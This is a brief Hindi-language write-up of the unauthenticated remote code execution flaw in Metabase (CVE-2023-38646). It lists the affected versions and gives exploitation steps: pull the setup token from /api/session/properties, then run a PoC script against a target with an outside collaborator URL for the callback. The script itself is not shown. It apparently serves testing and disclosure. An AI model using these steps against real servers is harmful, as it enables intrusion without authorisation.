
मेटाबेस प्री-ऑथ RCE

Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase एंटरप्राइज़ 1.46.6.1 से पहले हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर, मनमाने कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है। अन्य पैच किए गए संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, और 1.43.7.2 हैं।
http://vulnerablehost.com/api/session/properties पर जाएँ
"setup-token" पहचानें

एक collaborator URL प्राप्त करें (BurpSuite के साथ परीक्षण किया गया)
PoC स्क्रिप्ट को निम्न विकल्पों के साथ चलाएँ:
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>